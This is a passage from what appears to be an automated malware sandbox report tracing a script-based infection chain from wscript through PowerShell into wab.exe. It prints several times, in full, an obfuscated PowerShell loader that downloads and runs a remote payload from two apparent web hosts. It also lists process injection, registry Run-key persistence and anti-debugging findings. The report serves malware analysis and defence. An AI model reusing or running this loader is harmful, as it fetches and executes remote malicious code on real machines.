(Brandmyndighe
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. 
dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. 
dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 19_2_004044A4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF886FB3025 pushad ; ret 2_2_00007FF886FB313A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_0481EC78 pushfd ; retf 5_2_0481EC79
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07681FB2 push eax; mov dword ptr [esp], ecx 5_2_076821B4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_08F648A4 push ebx; ret 5_2_08F648A5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_08F62845 push cs; iretd 5_2_08F6284F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_08F64D9F push ss; ret 5_2_08F64DAC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_08F63571 push esp; ret 5_2_08F6358B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_08F63118 push eax; iretd 5_2_08F6311A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_08F652D2 push cs; ret 5_2_08F65301
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_08F62AAA push 00000009h; iretd 5_2_08F62AB7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_08F62291 push edx; retf 5_2_08F6229A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_08F63E85 push ebp; ret 5_2_08F63EC9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_08F60364 pushfd ; retf 5_2_08F60374
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_22B31219 push esp; iretd 10_2_22B3121A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_22B22806 push ecx; ret 10_2_22B22819
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_03A80364 pushfd ; retf 10_2_03A80374
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_03A82AAA push 00000009h; iretd 10_2_03A82AB7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_03A83E85 push ebp; ret 10_2_03A83EC9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_03A82291 push edx; retf 10_2_03A8229A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_03A852D2 push cs; ret 10_2_03A85301
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_03A84D9F push ss; ret 10_2_03A84DAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_03A83118 push eax; iretd 10_2_03A8311A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_03A83571 push esp; ret 10_2_03A8358B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_03A848A4 push ebx; ret 10_2_03A848A5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_03A82845 push cs; iretd 10_2_03A8284F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0044693D push ecx; ret 19_2_0044694D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0044DB70 push eax; ret 19_2_0044DB84
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0044DB70 push eax; ret 19_2_0044DBAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00451D54 push eax; ret 19_2_00451D61
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 21_2_0044B090 push eax; ret 21_2_0044B0A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 21_2_0044B090 push eax; ret 21_2_0044B0CC
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run gstes
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 21_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 21_2_004047CB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Service
Source: C:\Program Files (x86)\Windows Mail\wab.exe API/Special instruction interceptor: Address: 45859B3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 19_2_0040DD85
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5008 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4878 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5855 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3864 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 1920 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe API coverage: 9.5 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7708 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7840 Thread sleep count: 5855 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7840 Thread sleep count: 3864 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7872 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7468 Thread sleep count: 1920 > 30 Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread sleep count: Count: 1920 delay: -5 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_22B210F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 10_2_22B210F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_22B26580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA, 10_2_22B26580
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0040AE51 FindFirstFileW,FindNextFileW, 19_2_0040AE51
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 21_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 21_2_00407EF8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 22_2_00407898
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00418981 memset,GetSystemInfo, 19_2_00418981
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: wab.exe, 0000000A.00000002.2246278943.000000000051A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWH%V%SystemRoot%\system32\mswsock.dll
Source: wab.exe, 0000000A.00000002.2246278943.0000000000558000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWz
Source: wscript.exe, 00000000.00000003.1329861249.000001C22DBA7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: me ServerGoogle Chrome Elevation Service (GoogleChromeElevationService)Group Policy ClientGraphicsPerfSvcGoogle Update Service (gupdate)Google Update Service (gupdatem)Human Interface Device ServiceHV Host ServiceWindows Mobile Hotspot ServiceIKE and AuthIP IPsec Keying ModulesMicrosoft Store Install ServiceIP HelperIP Translation Configuration ServiceCNG Key IsolationKtmRm for Distributed Transaction CoordinatorServerWorkstationGeolocation ServiceWindows License Manager ServiceLink-Layer Topology Discovery MapperTCP/IP NetBIOS HelperLSMLanguage Experience ServiceDownloaded Maps ManagerMcpManagementServiceMicrosoft Edge Elevation Service (MicrosoftEdgeElevationService)Windows Mixed Reality OpenXR ServiceMozilla Maintenance ServiceWindows Defender FirewallDistributed Transaction CoordinatorMicrosoft iSCSI Initiator ServiceWindows InstallerMicrosoft Keyboard FilterNatural AuthenticationNetwork Connectivity AssistantNetwork Connection BrokerNetwork Connected Devices Auto-SetupNetlogonNetwork ConnectionsNetwork List ServiceNetSetupSvcNet.Tcp Port Sharing ServiceMicrosoft Passport ContainerMicrosoft PassportNetwork Location AwarenessNetwork Store Interface ServicePeer Networking Identity ManagerPeer Networking GroupingProgram Compatibility Assistant ServiceBranchCacheWindows Perception Simulation ServicePerformance Counter DLL HostPhone ServicePerformance Logs & AlertsPlug and PlayPNRP Machine Name Publication ServicePeer Name Resolution ProtocolIPsec Policy AgentPowerPrinter Extensions and NotificationsUser Profile ServiceWindows PushToInstall ServiceQuality Windows Audio Video ExperienceRemote Access Auto Connection ManagerRemote Access Connection ManagerRouting and Remote AccessRemote RegistryRetail Demo ServiceRadio Management ServiceRPC Endpoint MapperRemote Procedure Call (RPC) LocatorRemote Procedure Call (RPC)Security Accounts 
ManagerSmart CardSmart Card Device Enumeration ServiceTask SchedulerSmart Card Removal PolicyWindows BackupSecondary Log-onWindows Security ServicePayments and NFC/SE ManagerSystem Event Notification ServiceWindows Defender Advanced Threat Protection ServiceSensor Data ServiceSensor ServiceSensor Monitoring ServiceRemote Desktop ConfigurationSystem Guard Runtime Monitor BrokerInternet Connection Sharing (ICS)Spatial Data ServiceShell Hardware DetectionShared PC Account ManagerMicrosoft Storage Spaces SMPMicrosoft Windows SMS Router Service.SNMP TrapWindows Perception ServicePrint SpoolerSoftware ProtectionSSDP DiscoveryOpenSSH Authentication AgentSecure Socket Tunneling Protocol ServiceState Repository ServiceWindows Image Acquisition (WIA)Storage ServiceSpot VerifierMicrosoft Software Shadow Copy ProviderSysMainSystem Events BrokerTouch Keyboard and Handwriting Panel ServiceTelephonyRemote Desktop ServicesThemesStorage Tiers ManagementTime BrokerWeb Account ManagerDistributed Link Tracking ClientRecommended Troubleshooting ServiceWindows Modules InstallerAuto Time Zone UpdaterUser Experience Virtualization ServiceRemote
Source: wab.exe, 0000000A.00000002.2246278943.0000000000579000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: bhvB999.tmp.19.dr Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
Source: powershell.exe, 00000002.00000002.2065998160.00000137B1270000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Program Files (x86)\Windows Mail\wab.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_04819AD9 LdrInitializeThunk, 5_2_04819AD9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_22B22639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_22B22639
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 19_2_0040DD85
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 19_2_004044A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_22B24AB4 mov eax, dword ptr fs:[00000030h] 10_2_22B24AB4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_22B2724E GetProcessHeap, 10_2_22B2724E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_22B22639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_22B22639
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_22B22B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 10_2_22B22B1C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_22B260E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_22B260E2

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: amsi64_7548.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7792, type: MEMORYSTR
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3A80000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: FFDCC Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. 
dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proskriberes.Bet && echo t" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i 